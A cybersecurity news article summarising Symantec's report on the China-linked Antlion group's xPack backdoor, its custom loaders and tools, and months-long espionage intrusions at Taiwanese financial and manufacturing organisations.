Antlion APT group used a custom backdoor that allowed them to fly under the radar for months

Pierluigi Paganini February 03, 2022

A China-linked APT group tracked as Antlion used a custom backdoor called xPack that was undetected for months.

A China-linked APT group tracked as Antlion is using a custom backdoor called xPack in attacks aimed at financial organizations and manufacturing companies, Symantec researchers reported.

The backdoor was undetected for at least 18 months in a cyberespionage campaign against entities in Taiwan between 2020 and 2021.

“The attackers deployed a custom backdoor we have called xPack on compromised systems, which gave them extensive access to victim machines.” reads the analysis published by the Broadcom-owned company Symantec.

“The backdoor allowed the attackers to run WMI commands remotely, while there is also evidence that they leveraged EternalBlue exploits in the backdoor.”

xPack allowed threat actors to run WMI commands remotely and mount shares over SMB to transfer data from C2 servers to them. The malware was also used by the attackers to browse the web, likely using it as a proxy to mask their IP address.

Symantec researchers analyzed one of the attacks carried out by the APT group that remained in the compromised network of a manufacturing organization for 175 days.

In another attack against a financial organization, the APT group spent 250 days in the target’s network.

At this time it is not clear the initial infection vector, the researchers speculate attackers exploited a web application or service because they noticed in one attack that threat actors were utilizing the MSSQL service to execute system commands.

The xPack backdoor is a .NET loader that fetches and executes AES-encrypted payloads, it supports multiple commands. The decryption password is provided as a command-line argument (Base64 encoded string), and the xPack backdoor can run as a standalone application or as a service (xPackSvc variant).

“The xPack malware and its associated payload seems to be used for initial access; it appears that xPack was predominantly used to execute system commands, drop subsequent malware and tools, and stage data for exfiltration. The attackers also used a custom keylogger and three custom loaders.” continues Symantec.

Symantec researchers spotted the following custom tools used by Antlion in this campaign:

  • EHAGBPSL loader – custom loader written in C++ – loaded by JpgRun loader
  • JpgRun loader – customer loader written in C++ – similar to xPack, reads the decryption key and filename from the command line – decodes the file and executes it
  • CheckID – custom loader written in C++ – based on loader used by BlackHole RAT
  • NetSessionEnum – Custom SMB session enumeration tool
  • ENCODE MMC – Custom bind/reverse file transfer tool
  • Kerberos golden ticket tool based on the Mimikatz credentials stealer

The APT gang also used several off-the-shelf and living-off-the-land (LoL) tools (e.g. PowerShell, WMIC, ProcDump, LSASS, and PsExec).

Experts also noticed that attackers were exploiting CVE-2019-1458 for privilege escalation and remote scheduled tasks to execute their backdoor.

Attackers also used legitimate versions of WinRAR appear for data exfiltration and batch scripts to automate the data collection process. In some cases threat actors staged stolen data for further exfiltration.

The threat actors were returning periodically in the compromised network to launch xPack again and steal account credentials from the compromised organizations.

Symantec speculates Antlion is has been active since at least 2011, its TTP overlaps the ones associated with China-linked nation-state actors.

“The length of time that Antlion was able to spend on victim networks is notable, with the group able to spend several months on victim networks, affording plenty of time to seek out and exfiltrate potentially sensitive information from infected organizations.” concludes the report that includes IoCs and Yara Rules.. “The targeting of Taiwan is perhaps unsurprising given we know Chinese state-backed groups tend to be interested in organizations in that region.”

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, APT)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment